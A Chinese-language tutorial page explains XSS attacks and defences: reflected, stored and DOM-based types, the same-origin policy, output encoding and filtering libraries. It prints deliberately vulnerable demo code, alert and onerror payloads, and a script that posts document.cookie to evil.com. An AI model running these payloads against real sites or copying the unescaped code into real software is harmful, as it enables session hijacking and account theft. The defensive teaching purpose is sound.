



<!DOCTYPE html><html lang=zh-CN><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device" content="pc,mobile"><meta name="renderer" content="webkit"><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=5,viewport-fit=cover">
<title>XSS 跨站脚本攻击 的防御解决方案</title>	
<script src="//n4.ikafan.com/assets/run_prettify.js?ac"></script>
<link rel="stylesheet" href="//n4.ikafan.com/assetsg/style.css">
<!-- <link rel="stylesheet" href="//pic.ikafan.com/staticx/shuzhiduo/1/css.grace/fontello.css?ac"> -->
<!-- <link rel="stylesheet" href="//pic.ikafan.com/staticx/shuzhiduo/1/css.grace/animation.css?ac"> -->
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?c61d51e9fdcf1d1631ddfce8df9cd119";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script src="https://n4.ikafan.com/g/show.js"></script>

</head>
<div id="header" class="navbar navbar-default navbar-fixed-top header-01">
	<div class="container">
		<h1 class="logo">
			<a  href="/" title="巴特西"/>
							巴特西
			</a>
		</h1>
				<div role="navigation"  class="site-nav  primary-menu">
			<div class="menu-fix-box">
				 <ul id="menu-navigation" class="menu" >
<li><a href="/">首页</a></li>
<!-- <li><a href="/search/Hadoop/">Hadoop</a></li>
<li><a href="/search/Linux/">Linux</a></li>
<li><a href="/search/jQuery/">jQuery</a></li> -->
<li><a href="/search/Python/">Python</a></li>
<li><a href="/search/Java/">Java</a></li>
<li><a href="/search/PHP/">PHP</a></li>
<li><a href="/search/IOS/">IOS</a></li>
<li><a href="/search/Andorid/">Andorid</a></li>
<li><a href="/search/NodeJS/">NodeJS</a></li>
<li><a href="/search/JavaScript/">JavaScript</a></li>
<li><a href="/search/HTML5/">HTML5</a></li>
				</ul>					 			
			</div>
		</div>
				<!--<div class="right-nav">
				<button class="js-toggle-search"><i class="icon-search"></i></button>
		</div>-->
       
			</div>	
</div>

<div id="page-content">
	<div class="container">
		<div class="row">
			
			<div class="blog-post">
								<!--<div class="posts-top-cjtz clearfix"></div>-->
								<div class="post">
										<div class="post-title">
											<div id="title_top"></div>
<script>insertAdIfNeeded();</script>
						<h1 class="title">XSS 跨站脚本攻击 的防御解决方案</h1>
						<div class="post_icon">
							<span class="icon-clock-1"> 2024-03-29 22:35:35 </span>
						</div>
										<div class="post-content">
													<div id="single_top"></div>
<script>insertAdIfNeeded();</script>
											
		<p>虽然说在某些特殊情况下依然可能会产生XSS，但是如果严格按照此解决方案则能避免大部分XSS攻击。</p>
<p><strong>原则：宁死也不让数据变成可执行的代码，不信任任何用户的数据，严格区数据和代码。</strong></p>
<p>XSS的演示</p>
<p>Example 1:<br />几乎所有的网站上看到一个搜索框。有了这个搜索框，你可以搜索并找到在网站上存放的资料。这种搜索形式看起来像这样</p>
<ol><li><div>&nbsp;</div>
<div>
<div>&lt;form action="search.php" method="get"&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>    &lt;input type="text" name="q" value="" /&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>    &lt;input type="submit" value="send" /&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;/form&gt;</div>
</div></li></ol>
<p><img referrerpolicy="no-referrer"src="http://image.3001.net/uploads/image/20131028/20131028215631_58910.jpg" /></p>
<p>在search.php页面中，代码显示了搜索的结果，并且列出了用户输入的搜索关键字。形式如下:<br />&ldquo;Search results for Keyword&rdquo;或者&rdquo;You Searched for Keyword&rdquo;</p>
<p>search.php可以这么写来模拟功能:</p>
<pre class="prettyprint linenums"><code>&lt;h3&gt;You Searched for: &lt;?php echo($_GET['q']); ?&gt;</code></pre>
<p><img referrerpolicy="no-referrer"src="http://image.3001.net/uploads/image/20131028/20131028215643_64099.jpg" /></p>
<p>无论你输入任何关键字，它将随搜索结果一起被显示在网页上。现在想想会发生什么，如果一个攻击者试图从这个地方注入以下恶意脚本。</p>
<pre class="prettyprint linenums"><code>&lt;script&gt;alert('XSS injection')&lt;/script&gt;</code></pre>
<p><img referrerpolicy="no-referrer"src="http://image.3001.net/uploads/image/20131028/20131028215709_17451.jpg" /></p>
<p>可以看到，因为缺少对用户输入的有效的&rdquo;编码&rdquo;和&rdquo;过滤&rdquo;。导致了XSS攻击的发生，其实从本质上理解，XSS就是一种HTML的注入，和传统的buffer overflow是类似的思想，即没有对数据和代码进行有效的分离，在缓冲区溢出总，攻击者在通过超长的数据包发送覆盖了程序buffer的关键返回ret位置，导致CPU控制流的劫持，错误地把攻击者数据当作代码来执行，最后导致了缓冲区溢出。</p>
<p>而XSS中的HTML注入也是一种利用代码和数据未有效分离的攻击，只不过攻击发生在受害者用户的浏览器上，攻击者将数据发送给服务器，服务器没有对输入的数据进行有效的&rdquo;编码&rdquo;和&rdquo;过滤&rdquo;(即去除数据本身的代码特性，对于HTML来说就是去除它们称为Tag标签的可能)，导致了这些数据在用户的浏览器上得到执行，最终导致XSS攻击的发生。</p>
<p>Example 2:</p>
<p>很多网站都有私信或者留言板功能。登录用户可以发表评论或者给其他用户(包括管理员)发送私信。一个最简单的模拟表单如下:</p>
<ol><li><div>&nbsp;</div>
<div>
<div>&lt;form action="sendmessage.php" method="post'"&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;textarea name="message"&gt; &lt;/textarea&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;input type="submit" value="send" /&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;/form&gt;</div>
</div></li></ol>
<p>当用户点击发送时，这条消息会被保存在数据库中指定的数据表中，另一个用户当打开这条消息的时候将看到发送的内容。但是，如果一个恶意攻击者发送的内容包含了一些javascript代码，这些代码用于偷取敏感的cookie信息。当用户打开看到这条消息的时候，恶意的javascript代码就会得到执行，造成敏感cookie信息泄漏。攻击者可以利用获得这些cookie信息进行session hijacking会话劫持，直接以合法用户的身份登录其他用户的账户。</p>
<p>恶意攻击者可以在消息框中加入一下javascript代码:</p>
<ol><li><div>&nbsp;</div>
<div>
<div>var url = "http://www.evil.com/index.php"; //攻击者控制的服务器</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>var postStr = "ck=" + document.cookie;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>var ajax = null;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>if(window.XMLHttpRequest())</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>{</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>ajax = new XMLHttpRequest();</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>}</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>else if(window.ActiveXObject)</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>{</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>ajax = new ActiveXObject("Microsoft.XMLHttp");</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>}</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>else</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>{</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>return;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>}</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>ajax.open("POST", url, true);</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>ajax.send(postStr);</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>ajax.onreadystatechange = function()</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>{</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>if(ajax.readyState == 4 &amp;&amp; ajax.status == 200)</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>{</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>//alert("Done!");</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>}</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>}</div>
</div></li></ol>
<p>通过AJAX异步请求，将被攻击者的敏感cookie信息发送给了攻击者控制的服务器。攻击者随后即可利用这些cookie信息以&rdquo;合法&rdquo;用户的身份进行登录操作。</p>
<p>这里首先要理清楚几个重要的问题:</p>
<p>1. cookie的作用</p>
<pre class="prettyprint linenums"><code>Cookie，有时也用其复数形式Cookies，指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据（通常经过加密）。定义于RFC2109（已废弃），最新取代的规范是RFC2965。</code></pre>
<p>也就是说，cookie是用户和服务器之间的桥梁。服务器可以使用session来保存用户的身份信息(ID,购物车等)，但是需要用户在访问网页(发送HTTP数据包)的时候附带上相应的cookie，通过cookie中的特定值来识别sessionID，才能把单独用户和单独的session联系起来。cookie是有状态HTTP交互的一种重要机制。</p>
<p>2. 浏览器的同源策略</p>
<p>在进行cookie窃取的时候，攻击者偷取的cookie是什么，是全部cookie，还是当前这个网站的cookie？要解决这个问题，我们要先了解一些浏览器的同源策略。</p>
<ol><li><div>&nbsp;</div>
<div>
<div>同源策略，它是由Netscape提出的一个著名的安全策略。</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>现在所有支持JavaScript 的浏览器都会使用这个策略。</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>所谓同源是指，域名，协议，端口相同。</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>当一个浏览器的两个tab页中分别打开来 百度和谷歌的页面</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的，</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>即检查是否同源，只有和百度同源的脚本才会被执行。</div>
</div></li></ol>
<p>同源策略(Same Origin Policy)是一种约定，它是浏览器最核心也是最基本的安全功能，如果缺少了同源策略，则浏览器的正常功能可能都会受到影响。可以说web是构建在同源策略的基础之上的，浏览器只是针对同源策略的一种实现。</p>
<p>浏览器的同源策略限制了来自不同源的&rdquo;document&rdquo;或脚本，对当前&rdquo;document&rdquo;的读取或者设置某些属性。为了不让浏览器的页面行为发生混乱，浏览器提出了&rdquo;Origin&rdquo;(源)这以概念，来自不同的Origin的对象无法互相干扰。</p>
<p>因为同源策略的原因，也就导致了我们的XSS Payload(XSS攻击代码)必须在我们希望攻击的同一个域下触发。例如攻击者如果想窃取在<a href="http://www.a.com/" rel="external nofollow noreferrer">www.a.com</a>下的cookie，那就必须在<a href="http://www.a.com/" rel="external nofollow noreferrer">www.a.com</a>这个域(可以是不同页面，但要保证是同一个域)下的的某一个页面放置XSS代码，可以是存储型，也可以是反射型或DOM Baesd型的。</p>
<p>4. XSS攻击的种类</p>
<p>对XSS的分类没有明确的标准，但业界普遍将XSS攻击分为三类。反射型XSS(non-persistent XSS), 存储型XSS(persistent XSS), DOM Based XSS</p>
<p>4.1 非持久性跨站点脚本攻击</p>
<p>非持久性XSS也称为反射型跨站漏洞。它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。如果你看了我们上面所示的例子,第一个例子是一个非持久的XSS攻击。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。</p>
<p>4.2 持久的跨站点脚本攻击</p>
<p>持久型跨站点脚本也称为存储跨站点脚本。它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。在上面的示例中,第二个例子就展示了一个持久的XSS攻击。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。</p>
<p>4.3 基于dom的跨站点脚本攻击</p>
<p>基于DOM的XSS有时也称为type0 XSS。当用户能够通过交互修改浏览器页面中的DOM(Document Object Model)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。<br />通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。</p>
<ol><li><div>&nbsp;</div>
<div>
<div>&lt;script&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>    function test()</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>    {</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>        var str = document.getElementById("text").value;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>        document.getElementById("t").innerHTML = "&lt;a href='" + str + "' &gt;testLink&lt;/a&gt;";</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>    }</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;/script&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;div id="t"&gt;&lt;/div&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;input type="text" id="text" value="" /&gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;input type="button" id="s" value="write" onclick="test()" /&gt;</div>
</div></li></ol>
<p>在这个场景中，代码修改了页面的DOM节点，通过innerHTML把一段用户数据当作HTML写入到页面中，这就造成了DOM Based XSS</p>
<pre class="prettyprint linenums"><code>' onclick=alert(/xss/) '</code></pre>
<p>输入后，页面代码就变成了:</p>
<pre class="prettyprint linenums"><code>&lt;a href='' onclick=alert(/xss/) '' &gt;testLink&lt;/a&gt;</code></pre>
<p>点击这个新生成的链接，脚本将被执行。</p>
<p>实际上，这里还有另外一种利用方式&mdash;除了构造一个新事件外，还可以选择闭合掉&lt;a&gt;标签，并插入一个新的HTML标签:</p>
<pre class="prettyprint linenums"><code>'&gt;&lt;img src=# onerror=alert(/xss2/) /&gt;&lt;'</code></pre>
<p>页面代码变成了:</p>
<pre class="prettyprint linenums"><code>&lt;a href=''&gt;&lt;img src=# onerror=alert(/xss2/) /&gt;&lt;'' &gt;testLink&lt;/a&gt;</code></pre>
<p>5. XSS漏洞产生的原因</p>
<p>跨站点脚本的主要原因是程序猿对用户的信任。开发人员轻松地认为用户永远不会试图执行什么出格的事情,所以他们创建应用程序,却没有使用任何额外的代码来过滤用户输入以阻止任何恶意活动。另一个原因是,这种攻击有许多变体，用制造出一种<a href="https://www.baidu.com/s?wd=%E8%A1%8C%E4%B9%8B%E6%9C%89%E6%95%88&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_csd" rel="external nofollow noreferrer">行之有效</a>的XSS过滤器是一件比较困难的事情。<br />但是这只是相对的，对用户输入数据的&rdquo;编码&rdquo;和&rdquo;过滤&rdquo;在任何时候都是很重要的，我们必须采取一些针对性的手段对其进行防御。</p>
<p>6. 如何创造一个良好的XSS过滤器来阻止大多数XSS攻击代码</p>
<p>6.1 需要重点&rdquo;编码&rdquo;和&rdquo;过滤&rdquo;的对象</p>
<p>防御XSS有一个原则:</p>
<p>以当前的应用系统为中心，所有的进入应用系统的数据都看成是输入数据(包括从FORM表单或者从数据库获取到的数据)，所有从当前应用系统流出的数据都看作是输出(包括输出到用户浏览器或向数据库写入数据)</p>
<p>对输入的数据进行&rdquo;过滤&rdquo;，对输出数据进行&rdquo;编码&rdquo;。这里的&rdquo;编码&rdquo;也要注意，必须针对数据具体的上下文语境进行针对性的编码。例如数据是输出到HTML中的那就要进行HtmlEncode，如果数据是输出到javascript代码中进行拼接的，那就要进行javascriptEncode。</p>
<p>如果不搞清楚数据具体输出的语境，就有可能因为HtmlParser()和javascriptParser()两种解析引擎的执行先后问题导致看似严密的&rdquo;编码&rdquo;<a href="https://www.baidu.com/s?wd=%E5%BD%A2%E5%90%8C%E8%99%9A%E8%AE%BE&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_csd" rel="external nofollow noreferrer">形同虚设</a>。</p>
<p>6.2 HtmlEncode HTML编码</p>
<p>它的作用是将字符转换成HTMLEntities，对应的标准是ISO-8859-1<br />为了对抗XSS，在HtmlEncode中要求至少转换以下字符:</p>
<ol><li><div>
<div>&amp;   --&gt;   &amp;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&lt;   --&gt;   &amp;lt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>&gt;   --&gt;   &amp;gt;</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>"   --&gt;   "</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>'   --&gt;   '</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>/   --&gt;   /</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>在PHP中:</div>
</div></li></ol>
<p>htmlentities<br /><a href="http://www.w3school.com.cn/php/func_string_htmlentities.asp" rel="external nofollow noreferrer">http://www.w3school.com.cn/php/func_string_htmlentities.asp</a></p>
<p>htmlspecialchars<br /><a href="http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp" rel="external nofollow noreferrer">http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp</a></p>
<p>6.3 javascriptEncode javascript&rdquo;编码&rdquo;</p>
<p>javascriptEncode与HtmlEncode的编码方法不同，HtmlEncode是去编码，而javascriptEncode更多的像转义，它需要使用&rdquo;\&rdquo;对特殊字符进行转义。从原理上来讲，这都符合编码函数的一个大原则: 将数据和代码区分开，因为对于HTML Tag来说，我们对其进行&rdquo;可视化(转换成可以见字符)&rdquo;的编码可以将数据和HTML的界限分开。而对于javascript来说，我们除了要进行编码之外，还需要对特殊字符进行转义，这样攻击输入的用于&rdquo;闭合&rdquo;的特殊字符就无法发挥作用，从而避免XSS攻击，除此之外，在对抗XSS时，还要求输出的变量必须在引号内部，以避免造成安全问题。</p>
<p>escape()<br /><a href="http://www.w3school.com.cn/js/jsref_escape.asp" rel="external nofollow noreferrer">http://www.w3school.com.cn/js/jsref_escape.asp</a></p>
<p>该方法不会对 ASCII 字母和数字进行编码，也不会对下面这些 ASCII 标点符号进行编码： * @ &ndash; _ + . / 。其他所有的字符都会被转义序列(十六进制\xHH)替换。<br />利用这个编码函数，不仅能防御XSS攻击，还可以防御一些command注入。</p>
<p>7. 一些开源的防御XSS攻击的代码库</p>
<ol><li><div>&nbsp;</div>
<div>
<div>PHP AntiXSS</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>这是一个不错的PHP库,可以帮助开发人员增加一层保护，防止跨站脚本漏洞。</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>https://code.google.com/p/php-antixss/</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>xss_clean.php filter</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>https://gist.github.com/mbijon/1098477</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>HTML Purifier </div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>http://htmlpurifier.org/</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>xssprotect</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>https://code.google.com/p/xssprotect/</div>
</div></li>
<li><div>&nbsp;</div>
<div>&nbsp;</div></li>
<li><div>&nbsp;</div>
<div>
<div>XSS HTML Filter</div>
</div></li>
<li><div>&nbsp;</div>
<div>
<div>http://finn-no.github.io/xss-html-filter/</div>
</div></li></ol>												<div id="single_bottom"></div>
<script>insertAdIfNeeded();</script>
																
<h2>最新文章</h2>	
<ol>
						<li><a href="https://www.batexi.com/a/r8me0yrq.html">POJ 1160 题解</a>
		</li>
						<li><a href="https://www.batexi.com/a/4950olz8.html">PHP注册与登录【3】 用户登录与退出</a>
		</li>
						<li><a href="https://www.batexi.com/a/e9jmeog9.html">iOS程序破解&mdash;&mdash;class-dump获取头文件</a>
		</li>
						<li><a href="https://www.batexi.com/a/rqld66x9.html">js中的this关键字详解</a>
		</li>
						<li><a href="https://www.batexi.com/a/wq13xw58.html">jar包制作</a>
		</li>
						<li><a href="https://www.batexi.com/a/5qx1wmd9.html">linux基本命令&lpar;4&rpar;-8&period;Ubuntu-jdk&plus;tomcat&plus;eclipse软件包安装</a>
		</li>
						<li><a href="https://www.batexi.com/a/9j0pp0wq.html">【阿里云产品公测】大数据下精确快速搜索OpenSearch</a>
		</li>
						<li><a href="https://www.batexi.com/a/q1zwj4z9.html">Windows CE，你妈吗喊你在多核上玩玩</a>
		</li>
						<li><a href="https://www.batexi.com/a/qdp001zq.html">2014年去哪儿网笔试题--有两个文件context&period;txt和words&period;conf&comma;请尝试将他们合并成为一段文字，并打印出来。</a>
		</li>
						<li><a href="https://www.batexi.com/a/9jz0xrw8.html">TCP连接的建立（二）</a>
		</li>
						<li><a href="https://www.batexi.com/a/q2jxr4w8.html">IOS 9人机界面指南（1）</a>
		</li>
						<li><a href="https://www.batexi.com/a/q2jmm4l8.html">Mac快速查看某条命令的版本和存放的位置（ls -l &grave;which mvn&grave;）</a>
		</li>
						<li><a href="https://www.batexi.com/a/qwj45oz8.html">Git相关操作一</a>
		</li>
						<li><a href="https://www.batexi.com/a/qdp43d0q.html">Angular教程测试运行过程中产生的一些问题</a>
		</li>
						<li><a href="https://www.batexi.com/a/q4j237nq.html">linux 链接理解</a>
		</li>
						<li><a href="https://www.batexi.com/a/8kj6mg39.html">C&num; 创建多级文件夹示例</a>
		</li>
						<li><a href="https://www.batexi.com/a/q7ovkzx8.html">tensorflow笔记9：nn&lowbar;ops&period;bias&lowbar;add 函数</a>
		</li>
						<li><a href="https://www.batexi.com/a/qyy75z2q.html">ES6 学习笔记&lpar;整理一遍阮一峰大神得入门文档，纯自己理解使用&rpar;</a>
		</li>
						<li><a href="https://www.batexi.com/a/9pwzjzk8.html">Using The jQuery Migrate Plugin</a>
		</li>
						<li><a href="https://www.batexi.com/a/qyye4jgq.html">WPF中的TextBlock隐藏边框</a>
		</li>
		</ol>
	

<h2>热门文章</h2>	
<ol>
									<li><a href="https://www.batexi.com/a/8o17d41q.html">C&num;中隐式运行CMD命令行窗口的方法</a>
			</li>
						<li><a href="https://www.batexi.com/a/9pwzmgy8.html">ubuntu下使用fstab挂载硬盘时，属于root，如何把它改为属于一个用户的（如sgjm&rpar;</a>
			</li>
						<li><a href="https://www.batexi.com/a/9r5o467q.html">网上流行的linux内核漫画</a>
			</li>
						<li><a href="https://www.batexi.com/a/9r5o4oeq.html">JNI，RegisterNative参数解析</a>
			</li>
						<li><a href="https://www.batexi.com/a/9j1knjl9.html">科学技术库Numpy</a>
			</li>
						<li><a href="https://www.batexi.com/a/8zymr6v9.html">Java的GUI设计小技巧</a>
			</li>
						<li><a href="https://www.batexi.com/a/90royem9.html">PHP时间范围：本周、本月、下月等简写</a>
			</li>
						<li><a href="https://www.batexi.com/a/9pwzgey8.html">hadoop配置分区</a>
			</li>
						<li><a href="https://www.batexi.com/a/8e4droe9.html">jquery的bind&lpar;&rpar;和trigger&lpar;&rpar;</a>
			</li>
						<li><a href="https://www.batexi.com/a/qnv34z38.html">20155205 2016-2017-2 《Java程序设计》第10周学习总结</a>
			</li>
			</ol>			
							
					</div>

					
<div class="next-prev-posts clearfix">
</div>
						 
				</div>
				
	<div class="clear"></div>

			</div>	
			

		</div>
</div>
</div>


<div class="clearfix"></div>
<div id="footer" class="two-s-footer">
	<div class="footer-box">
		<div class="container">
			<div class="row" style="padding-left: 15px;padding-right: 15px;">
			<div class="nav-footer">
				<a href="/">Home</a>
				</div>
				<div class="copyright-footer">
					<p>Powered By WordPress</p>
				</div>
							</div>
		</div>
	</div>
</div>
<div style="display:none">

</div>
<script src="//n4.ikafan.com/assets/js/echo.js"></script>
<script>
    echo.init({
      offset: 100,
      throttle: 250,
      unload: false,
      callback: function (element, op) {
        console.log(element, 'has been', op + 'ed')
      }
    });
 </script>
</body>
</html>
